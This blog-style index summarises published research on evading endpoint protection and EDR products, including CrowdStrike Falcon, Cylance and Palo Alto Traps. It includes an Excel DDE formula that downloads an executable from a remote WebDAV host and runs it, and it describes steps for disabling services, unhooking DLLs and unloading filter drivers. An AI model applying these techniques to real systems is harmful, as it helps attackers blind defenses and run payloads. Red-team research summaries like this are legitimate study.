Endpoint Protection, Detection and Response Bypass Techniques Index
I’ve recently seen a bunch of articles and researches on endpoint protection and endpoint detection and response bypass techniques, so I decided to spend my research time to do document about these techniques and how was it done in summary. There is no category on these techniques as far as I know so I will simply categorize techniques by products.
Before we begin, I would like to point out to another great research from @Hexacorn on a review of current EDR solutions on the market. This spreadsheet presents EDRs features and capabilities in summary which is useful to utilize as targets to evade and bypass.
tr4cefl0w posted on 0x00sec forum on a technique to completely bypass Falcon detection capability. The technique is including the following steps:
- He achieved code execution via Dynamic Data Exchange (DDE) in Excel because Microsoft has already patched and disabled the feature in December 2017. The formula used to leverage this attack is simple
- He utilized WebDAV server to drop a dropper, which is
nc.exe. Apache2 with
mod_webdavemodule enabled is used in this step. The embedded formula must be changed to something like
=cmd|'/c cmd.exe /c "copy \\x.x.x.x\webdav\run.txt c:\users\public\run.exe" && cmd.exe /c "c:\users\public\run.exe"'!_xlbgnm.A1
- Unbelievably, it just works when he tried to simulate victim by open the attachment from email and allow embedded to execute
Komodo Research describes three ways to bypass CrowdStrike falcon:
- With LOCAL SYSTEM, they can just disable user-mode service
CSFalconServicewith net command which will prevent remote remediation from the console.
- They have a theory on not to leave things CrowdStrike will detect. To practice this theory, they create a reverse dynamic port forwarding tunnel on internal compromised machine. Thus, they can use the compromised machine to access the internal network without alerting from CrowdStrike Falcon.
- They just installed Qemu on the internal compromised machine for internal discovery and lateral movement.
MDSec covers many interesting points for Cylance:
- The main feature focuses on blocking malicious script such as Windows Scripting, Powers and Office macros doesn’t cover Excel 4.0 macros which is not much well known feature compared to VBA macros. More on weaponizing Excel 4.0 macros.
- For Memory Protections feature, Cylance injects
CyMemDef64.dllto a process. When a malicious process is executing, hooks placed by these DLLs will use to detect execution of a suspicious function. From this fact, MDSec created a function to unhook Cylance’s DLL from DLL export.
- Cylance also offers Application Control feature to prevent risky applications execution such as PowerShell. Cylance still uses the same technique as described on Memory Protections to enforce policies. MDSec found that inside
CyMemDef64.dll, there is a function which compares the executable’s name with something like
PowerShell.exe. These DLLs also check for existence of reference to
powershell.pdbin PE debug directory. If these two conditions are true,
CyMemDefPS64.dllwill be loaded to send a warning message. Thus, MDSec spawned PowerShell process with
CREATE_SUSPENDflag and modify the reference to PDB before resuming an execution, resulting as bypassing Application Control feature.
- MDSec also found a way to bypass VBA execution protection. By analyzing Cylance, MDSec discovered that Cylance adds hooks to VBA runtime, for example,
VBE7.dllwhich contains functions such as Shell and CreateObject. By the way, Cylance did nothing with the exposed COM object. So, MDSec just directly enabled Windows Script Host Object Model on VBA project to use
WshShellobject to bypass hooked
- Isolation feature on Cylance OPTICS stores an unlock key on
HKEY_LOCAL_MACHINE\SOFTWARE\Cylance\Optics\PdbPwhich can be simply decrypted using DPAPI master key available on Cylance OPTIOCS assemblies. The Isolation feature can also be bypassed by executing
unlock-netwithout providing key from LOCAL SYSTEM.
Hoang Bui pointed out about hooking and bypassing techniques on
Palo Alto Traps
@c0d3xpl0it at Bits of Security wrote a blog to present an idea to bypass Traps. The technique utilized built-in tool
FLTMC.exe which can be used to manage filter driver to unload Traps' file monitoring filter driver. The technique required administrator privilege to issue the commands.
Mantvydas Baranauskas at Red Teaming Experiments presented an idea to modify shellcode in purpose of evading detection, which I personally think that it is similar but not the same to Ghost Writing technique I learnt on SEC504. This technique can be accomplished by changing parts of shellcode to avoid some kind of pattern detection, and flip it back before deploying to the allocated memory.